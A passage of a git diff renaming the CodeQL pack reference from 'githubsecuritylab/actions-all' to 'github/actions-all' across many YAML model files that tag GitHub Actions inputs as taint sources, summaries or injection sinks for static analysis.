b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index 3afd9991e073..abdcdd6d6986 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index 3deae2a9f197..ecfdbfb98a0b 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml index 7dd0459ab7f9..ea7ab3125284 100644 --- a/ql/lib/ext/anchore_sbom-action.model.yml +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml index 721042aafaf0..21ea405b32c5 100644 --- a/ql/lib/ext/anchore_scan-action.model.yml +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml index ee4dbaf2b55e..1e95a8c02736 100644 --- a/ql/lib/ext/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml index 76ae920d2550..1ecba6ef1a18 100644 --- a/ql/lib/ext/android-actions_setup-android.model.yml +++ b/ql/lib/ext/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml index 46f667d75a01..5d7cb6e0b916 100644 --- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml index 4df6fe61a43f..26b2e2eb693a 100644 --- a/ql/lib/ext/asdf-vm_actions.model.yml +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml index aab329160ea1..99324837e759 100644 --- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml index 610d188f0655..cd827ffc2f87 100644 --- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml index b571bded8ca8..64abc03a5fb3 100644 --- a/ql/lib/ext/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/aszc_change-string-case-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml index cd8f4f73e498..63eb8b21249d 100644 --- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml index 6ebc3875e07b..170ceb2f95cb 100644 --- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml index 2b2dbd014b7f..e050b61815e5 100644 --- a/ql/lib/ext/azure_powershell.model.yml +++ b/ql/lib/ext/azure_powershell.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml index 78b7eb1394c2..7d646dece692 100644 --- a/ql/lib/ext/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml index 0f146da2e0cb..fb03722c16ad 100644 --- a/ql/lib/ext/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml index 483a3bf51727..a14748aead07 100644 --- a/ql/lib/ext/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index e06e75f7a3bf..4caf23c8812f 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index d0a88ff31673..1fa66b8ceb64 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml index a29f84a55b5e..f2fed75539b4 100644 --- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index 0e11fe45b42c..dfaffaf87deb 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml index 7e0970034a52..7bab09bca76d 100644 --- a/ql/lib/ext/changesets_action.model.yml +++ b/ql/lib/ext/changesets_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["changesets/action", "*", "input.publish", "command-injection", "manual"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml index 2f62f211da9c..86759ad40d5c 100644 --- a/ql/lib/ext/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index f94ad242321d..65474ba343d6 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml index 5872399881c5..e3dd557084b6 100644 --- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index 02c5dcd3ccaa..f3cb32b612ff 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 45bf0c57355a..639ee965f42e 100644 --- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml index 4ac3492c41c3..40d03569c8d5 100644 --- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index a48da0cedfcc..ed20a5623750 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml index 6ca7aa86c06d..22725484ea46 100644 --- a/ql/lib/ext/dailydotdev_action-devcard.model.yml +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml index 11f1f10980fe..d7839211e20d 100644 --- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml index 9ed2cb7908b8..3ff92757361b 100644 --- a/ql/lib/ext/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml index 7f279f37a45d..2e41b4f8eb5b 100644 --- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index 68f434f4797a..62ff29bc9f0c 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 890a47c79fca..af4e15da03b0 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml index aff5c3303165..2dbf47187144 100644 --- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml index 8f5e22fa2d96..4bc7e2518080 100644 --- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml index ff0131da99e3..845ae1770ed4 100644 --- a/ql/lib/ext/docker_build-push-action.model.yml +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml index 1d82fb8f836f..780acdb98fff 100644 --- a/ql/lib/ext/endbug_latest-tag.model.yml +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml index 1e4cc21dd130..038f1639d3cf 100644 --- a/ql/lib/ext/expo_expo-github-action.model.yml +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml index ba729868a040..d948bda8bf43 100644 --- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 504f0693977d..ed9eeb6b2520 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index 48267b6d0820..f6441133c7af 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml index 26eea1d2341b..357ffc1c94a8 100644 --- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml index 7993d827fa6f..0288103fd0ad 100644 --- a/ql/lib/ext/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index de48ea5a7092..05dca2f8262a 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml index 36a9b24f0891..123dabe450e9 100644 --- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index f04f8dda6c8e..a098666dba01 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index a37d6452d504..476c522f5ea0 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index 352eb51996af..ad369575c423 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index 44f34c11cb3d..e68306a454c8 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index 3fd2e46296ab..923d267ac662 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index 881374b6c903..9557cbbee80d 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index 6d77c866dc25..eea604dc8ddc 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 0b27c5845844..5ee8503193bc 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index 911d3e571558..44795adc64a0 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index 1ac668cf55ac..a1a7e28f5722 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ 